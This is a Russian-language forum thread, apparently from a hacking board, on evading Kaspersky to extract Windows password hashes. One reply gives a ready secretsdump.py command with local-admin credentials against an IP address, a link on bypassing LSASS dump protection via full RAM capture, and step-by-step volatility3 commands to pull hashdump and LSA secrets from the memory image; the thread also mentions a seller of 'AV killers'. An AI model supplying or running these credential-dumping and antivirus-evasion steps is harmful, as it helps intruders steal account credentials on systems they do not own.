AV\EDR Обход касперского

[zhenia]

Добрый день.

Интересна тема обхода антивируса, в моем случае касперского, а именно: какие варианты есть извлечения хэша пароля пользователей на компьютере, где стоит каспер? Дамп памяти не сделать - каспер не дает. Локально отключить также нет возможности, несмотря на привелегии локального админа. Может быть кто-то сталкивался

 

[IIIIXX]

Если есть ЛА, можно сдампить хеши удаленно (не лсас)

secretsdump.py localadministrator:'Summer2023#'@10.17.43.666

Еще есть вариант сделать полный дамп памяти как описано в этой статье через Magnet RAM Capture

https://www.linkedin.com/pulse/bypass-lsass-dump-protection-ram-jo%C3%A3o-paulo-de-andrade-filho/

и потом собрать хешдамп и дамп лса через

# ubuntu install
sudo apt update -y && sudo apt install git python3 pip3 -y

git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
pip3 install -r requirements.txt
python3 setup.py build
python3 setup.py install

# dump info
python3 vol.py -f /dump.raw windows.inf

# hashdump
python3 vol.py -f /dump.raw hashdump

# lsa memory dump
python3 vol.py -f /dump.raw lsadump
python3 vol.py -f /dump.raw windows.lsadump

Еще был паренек который продавал ав киллеры, но он в бане.

 

[xrahitel]

Выше как понял статья от сюда тыц так до кучи тыц)

 

[IIIIXX]

Выше как понял статья от сюда тыц так до кучи тыц)

да, и в примере используется volatility3 которая предустановлена в кали, но лично у меня с кали не получилось запустить ее, на чистую убунту встал нормально

 

[michael_]

Думаю, мы только что нашли представителя "Касперского", получающего бесплатную консультацию.

 

[IIIIXX]

Думаю, мы только что нашли представителя "Касперского", получающего бесплатную консультацию.

В соседних темах еще есть представители vmware, sophos, cisco
как страшно жить